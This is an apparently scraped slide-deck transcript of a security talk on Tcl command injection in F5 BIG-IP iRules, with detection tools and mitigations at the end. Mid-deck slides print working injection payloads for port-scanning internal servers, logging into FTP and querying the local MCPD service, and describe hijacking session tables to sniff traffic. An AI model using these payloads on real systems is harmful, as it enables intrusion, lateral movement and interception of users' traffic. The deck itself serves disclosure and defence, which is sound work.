command injection in irules loadbalancer scripts · 2019. 8. 9. · irules determine where a given...
TRANSCRIPT
![Page 1: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/1.jpg)
A story about how TCL interpretation works in F5 iRulesand how it can be detected or exploited
COMMAND INJECTION IN IRULES LOADBALANCER
SCRIPTS
![Page 2: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/2.jpg)
Big thanks to my fellow researchers
▪ Jesper Blomström
▪ Pasi Saarinen
▪ William Söderberg
▪ Olle Segerdahl
Twitter @kuggofficial
Big thanks to David and Aaron at F5 SIRT for a good response https://support.f5.com/csp/article/K15650046
WHOAMI AND THANKS
![Page 3: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/3.jpg)
F-SECURE IS ONE OF THE LEADING CYBER SECURITY CONSULTING PROVIDERS GLOBALLY
CLIENTS
250+Clients
THOUGHT LEADERSHIP
300+Publications &
research released
annually
ACCREDITATIONS
12Internationally
recognised
CAPABILITY
250+Technical
consultants
Security assessments
Hardware security
assessmentsRed teaming
Incident Management &
Forensics
Development programs
Audit & analysisCoaching & exercises
Intelligence platform
Intelligence services
TECHNICAL SECURITY SERVICES
RISK & SECURITY MANAGEMENT
CYBER INTELLIGENCE
![Page 4: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/4.jpg)
LOAD BALANCERS
![Page 5: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/5.jpg)
▪ Can store and handle multiple sessions for backend servers
▪ Customers write their own iRules to define the load balancer behaviour
▪ https://devcentral.f5.com is used as a ”stackoverflow for iRules”
▪ Application fluency for all major protocols.
▪ Highly programmable through iRules, iRules LX and Traffic Policies
▪ Deployable as software and hardware
▪ Scalable to Tb/s of performance and highly available for both data and control plane
▪ WAF functionality
THE F5 PRODUCTSI WILLTALK ABOUT
Internet
HTTP Server 2
BIG-IP Load balancer
HTTP Server 1
TLS
![Page 6: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/6.jpg)
CACHING IRULEEXAMPLE
Browser LoadbalancerBackend
webservers
GET /favicon.ico
iRule
HTTP 200 OK
![Page 7: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/7.jpg)
FORWARDINGEXAMPLE
Browser LoadbalancerBackend
webservers
GET /index.html
iRule
HTTP 200 OK
GET /index.html
HTTP 200 OK
![Page 8: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/8.jpg)
▪ A fork of TCL 8.4
▪ New features in TCL >8.4 are not introduced in iRule
▪ iRule has introduced a group ofsimplifications and exceptions to TCL
▪ Return oriented programming (withoptional exception handling)
THE IRULELANGUAGE
![Page 9: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/9.jpg)
▪ iRules determine where a given HTTP request is forwarded to, based on a programmed logic
▪ The HTTP request header and body is parsed by the F5 iRule engine
▪ The system admnistrator writes F5 iRule code to handle requests
▪ Example ”catch-all” redirect iRule:
TCL/ IRULEBASICS
when HTTP_REQUEST {
HTTP::redirect ”/helloworld.html”
}
![Page 10: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/10.jpg)
HTTP header include
▪ Server: BigIP
Found in redirects
Found in favicon.ico responses
HOWTO SPOT THESELOADBALANCERSIN THE WILD
HTTP/1.0 302 Found
Location: /helloworld.html
Server: BigIP
Connection: close
Content-Type: Text/html
Content-Length: 0
![Page 11: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/11.jpg)
![Page 12: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/12.jpg)
TCLSUPPORTS ARGUMENT SUBSTITUTION
![Page 13: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/13.jpg)
▪ An argument is evaluated by breaking down words and substituting its meaning depending on the string enclosure
COMMANDARGUMENTS
1. command ”$arg1” ”$arg2” # Quoted arguments
2. command [$arg1] [$arg2] # Bracketed arguments
3. command {$arg1} {$arg2} # Braced arguments
4. command $arg1 $arg2 # Unquoted arguments
![Page 14: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/14.jpg)
Inside double quotes (”): ”Command
substitution, variable substitution, and
backslash substitution are performed on
the characters between the quotes …”
Inside brackets []: ”If a word contains an
open bracket (“[”) then TCL performs
command substitution.”
▪ Like backticks ` in /bin/sh
QUOTEDEVALUATIONAND COMMANDSUBSTITUTION
![Page 15: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/15.jpg)
Bart: Is Al there?Moe: Al?Bart: Yeah, Al. Last name Caholic?Moe: Hold on, I'll check. Phone call for Al... Al Caholic. Is there an Al Caholic here?(The guys in the pub cheer.)
THISIS A COMMANDINJECTION
15
![Page 16: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/16.jpg)
The body part of command invocation is a list of commands to execute if a condition is met
In these cases the value of $body will be command substituted regardless ofquote unless braces are used
ARGS AND BODYUNQUOTEDCOMMANDSUBSTITUTION
command ?arg? ?body?
1. after 1 $body
2. while 1 $body
3. if 1 $body
4. switch 1 1 $body
![Page 17: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/17.jpg)
TCL will expand the value of a command before assignment if it is put inside quotes
https://wiki.tcl-lang.org/page/Injection+Attack
set variable {This is a string}
catch "puts $variable"
When double quotes are used, TCL will substitute the content of the variables and commands
Try:
set variable {[error PWNED!]}
When the contents of $variable is substituted by TCL it will be passed as [error PWNED!]
to catch and executed. This is called double substitution
PRIOR ART: COMMANDINJECTIONIN TCL8.4
![Page 18: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/18.jpg)
1. The word catch is resolved as a command with a ?body?argument
2. Arguments are evaluated by the TCL interpreter according to the dodecalogue, includingexpansion of [ ] ” ”{ }
3. Any code within arguments starting with [ will be executedby catch
BREAKINGDOWN EXECUTION
catch ”puts $variable”
catch puts [error PWNED!]
error PWNED!
![Page 19: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/19.jpg)
▪ after
▪ catch
▪ eval
▪ expr
▪ for
▪ foreach
▪ history
▪ if
▪ proc
▪ cpu
▪ string match
▪ interp
▪ namespace eval
▪ namespace inscope
▪ source
▪ switch
▪ subst
▪ time
▪ try
▪ uplevel
▪ while
▪ trace
▪ list
LIST OFBUILT-IN COMMANDSTHATCANPERFORMCOMMANDEVALUATION
![Page 20: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/20.jpg)
DIRECTEVALUATION: EVAL, SUBSTOR EXPR
subst - Performbackslash, command, and variablesubstitutions.
subst ?-
nobackslashes? ?-
nocommands? ?-
novariables?
String
eval, a built-in Tcl command, interprets its arguments as a script, which it thenevaluates.
eval arg ?arg ...?
expr, a built-in Tcl command, interprets its arguments as a mathematicalexpression, which it thenevaluates.
expr arg ?arg
...?
![Page 21: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/21.jpg)
IRULEBASEDON HSSR
Browser LoadbalancerBackend
webservers
GET /index.html
iRule
HTTP 200 OK
GET /index.html
HTTP 200 OK
when HTTP_REQUEST {if {[HTTP::uri] starts_with "/index.html"} { set lang [HTTP::header {Accept-Language}]set uri http://$lang.cdn.example.com/index.htmlset status [call /Common/HSSR::http_req -uri $uri]
}}
![Page 22: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/22.jpg)
HOWHSSR USESOUR$URI
![Page 23: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/23.jpg)
1. Identify an input field that is command substituted in iRule
Input Tcl strings in fields and headernames
Look for indications that the code wasexecuted
2. Test injection location using the info command
3. Identify external resources to pivot to permanent access
EXPLOITATION
![Page 24: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/24.jpg)
DEMO TIME
![Page 25: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/25.jpg)
How do we get persistent access?
TAKING IT FURTHER
![Page 26: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/26.jpg)
GAININGPERMANENT
ACCESS USING”TABLE”
▪ A session table is a distributedand replicated key value store
▪ Commonly used to store cookie values
Notably used to avoid paying for the APM module
▪ Magically synchronized betweeninstances using load balancing
Can be used to pivot access on multiple instances
![Page 27: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/27.jpg)
HACKING THE SESSION TABLE
▪ With command injection it’spossible to overwrite any table value
▪ table set
▪ table lookup
▪ table add
▪ table replace
▪ Overwriting another (or all) usersession enable specificallyexecuting code for a target user
▪ Possible to sniff all http(s) traffic for any authenticated user
![Page 28: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/28.jpg)
TABLE DEMO: HOSTED MITM
![Page 29: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/29.jpg)
A LOOK AT THE CODEIN THE BIG-IP EDITOR
![Page 30: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/30.jpg)
POST EXPLOITATIONPOSSIBILITIES
▪ Scan internal network
▪ Scan localhost
▪ Attack internal resources usingthe BIG-IP F5 as a pivot
![Page 31: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/31.jpg)
Exposing the pool (backend) servers
active_nodes -list [LB::server pool]
PAYLOAD1
![Page 32: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/32.jpg)
PORTSCANTHE POOL SERVERS
foreach p {21 80 135 389 443 445}{catch {set c [connect192.168.200.5:$p];append r $p "\topen\n";close $c}};TCP::respond $r
![Page 33: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/33.jpg)
LOGGINGIN TO THE FTP SERVICE
catch {set c [connect 192.168.200.5:21];recv -timeout 200 $c d;recv -timeout 200 $c d;send -timeout 200 $c "USER anonymous\r";recv -timeout 200 $c d;send -timeout 200 $c "PASS [email protected]\r";recv -timeout 200 $c d;};
close $c;TCP::respond $d
![Page 34: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/34.jpg)
ATTACK CHAIN
Browser LoadbalancerProtected
webservers
GET / index.html
iRule
230 User logged in.
FTP request
FTP response
![Page 35: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/35.jpg)
PAYLOAD2PORTSCANLOCALHOST
![Page 36: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/36.jpg)
PAYLOAD3 QUERY ALL MCPDSYSTEM MODULE
set c [connect 127.0.0.1:6666];send $c {%00%00%00%16%00%00%00%3f%00%00%00%00%00%00%00%02%0b%65%00%0d%00%00%00%0c%21%e0%00%0d%00%00%00%02%00%00%00%00%00%00};recv -timeout 10000 $c d;TCP::respond $d
![Page 37: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/37.jpg)
MCPD EXPLANATION
%00%00%00%16 SIZE
%00%00%00%3f SEQUENCE
%00%00%00%00 REQUEST-ID
%00%00%00%02 FLAG
%0b%65 KEY (Query All)
%00%0d TYPE
%00%00%00%0c ATTRIBUTE SIZE
%21%e0 ATTRIBUTE NAME (System Module)
%00%0d%00%00%00%02%00%00%00%00 (Attribute data)
%00%00 END OF MESSAGE
![Page 38: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/38.jpg)
LIST USERSAND PRIVILEGES
![Page 39: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/39.jpg)
LIST LOCALTMSHSHELLCOMMANDS(BEYONDIRULE)
![Page 40: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/40.jpg)
1. iRule injection access
2. Query MCPD
3. Mcpd response
4. Execute MCPD tmsh command withTcl injection
5. …
6. Local privilegies
ATTACK CHAIN
![Page 41: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/41.jpg)
DETECTION
![Page 42: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/42.jpg)
SCANNING FOR COMMANDINJECTION
WITH TCLSCAN
▪ Automated tool to find quoted and unquoted arguments
▪ It’s unmaintained Rust so I had to fix it
▪ Finds 80% of known injectionvulnerabilities
▪ Get the code: https://github.com/kugg/tclscan
![Page 43: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/43.jpg)
▪ Automated iRule injection detector scanner for Burp Suite
▪ The tool will substitute every available input field with a Tcl injection and measure the result
▪ Download iruledetector.py in the bapp-store
AUTOMATEDTESTINGUSINGIRULEDETECTOR.PY
![Page 44: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/44.jpg)
UNIT TESTINGIRULE CODE
USING TESTCL
▪ Get the code: https://github.com/landro/testcl
▪ Unit testing framework for iRulecode
▪ Community driven, lacks complexsupport
▪ I added cookie support
▪ Good for unit testing code and finding logical vulnerabilities
![Page 45: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/45.jpg)
▪ Tcl is an old and loosely definedlanguage
Easy to fool
Hard to get variable assignment and substitution right
▪ Avoid the use of eval, subst and expr
▪ Take care to use {bracing} of ?body?arguments.
▪ Use iruledetector.py in burp to findvulnerabilities
▪ Use tclscan to review code
▪ Use testcl to test your iRule logic
▪ Do manual third party code reviews
SUMMARY
![Page 46: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/46.jpg)
THANK YOU
![Page 47: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS · 2019. 8. 9. · iRules determine where a given HTTP request is forwarded to, based on a programmed logic The HTTP request header](https://reader036.vdocument.in/reader036/viewer/2022081410/60a2f8b733668b4c61440608/html5/thumbnails/47.jpg)
1. iRule injection access
2. Query MCPD
3. Mcpd response
4. Execute MCPD tmsh command withTcl injection
5. …
6. Local privilegies
ATTACK CHAIN
Browser Loadbalancer
1. iRule injection (mcpd)
iRule
iRule
3. mcpd response
4. Irule with tmsh
5. Tcl shell response
2. mcpd
query